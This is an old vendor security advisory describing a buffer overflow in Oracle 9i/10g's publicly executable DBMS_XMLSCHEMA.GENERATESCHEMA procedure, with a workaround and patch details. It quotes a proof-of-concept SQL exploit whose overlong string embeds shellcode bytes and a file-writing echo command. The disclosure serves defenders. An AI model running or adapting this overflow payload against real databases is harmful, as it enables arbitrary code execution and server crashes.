Red-Database-Security GmbH is specialized in Oracle SecurityProductsRepscan 2.5 Hedgehog Enterprise Checkpwd (free)
Services
Information
Company |
Buffer Overflow in XDB DBMS_XMLSCHEMA in Oracle 9i and 10g Rel 1
Details Oracle Database Server provides the DBMS_XMLSCHEMA Package that include procedures to register and delete XML schemas. This package contains the public procedures GENERATESCHEMA and GENERATESCHEMAS that are vulnerable to buffer overflow attacks. By default XDB.DBMS_XMLSCHEMA has EXECUTE permission to PUBLIC so any Oracle database user can exploit this vulnerability. Exploitation of this vulnerability allows an attacker to execute arbitrary code. It can also be exploited to cause DOS (Denial of service) killing Oracle server process. Example Sample Exploit from Argeniss for Oracle 10g Rel.1 on Windows. Proof of concept exploit code Oracle Database Buffer overflow vulnerability in public procedure DBMS_XMLSCHEMA.GENERATESCHEMA http://www.argeniss.com/research.html By Esteban Martinez Fayo Oracle version: 10g Release 1 Platform: Windows Shellcode creates file c:\Unbreakable.txt and writes "ARE YOU SURE?" */ SELECT XDB.DBMS_XMLSCHEMA.GENERATESCHEMA ('a', 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDE' || chr(212)||chr(100)||chr(201)||chr(01)||chr(141)||chr(68)||chr(36)||chr(18)||chr(80)||chr(255)||chr(21) ||chr(192)||chr(146)||chr(49)||chr(02)||chr(255)||chr(21)||chr(156)||chr(217)||chr(49)||chr(2)||chr(32) ||'echo ARE YOU SURE? >c:\Unbreakable.txt') FROM DUAL; Workaround Revoke public privilege from DBMS_XMLSCHEMA. Patch Information Apply Oracle Critical Patch Update from January 2006 or later. © 2005 by Red-Database-Security GmbH - last update 27-jan-2006 |
XMLDB |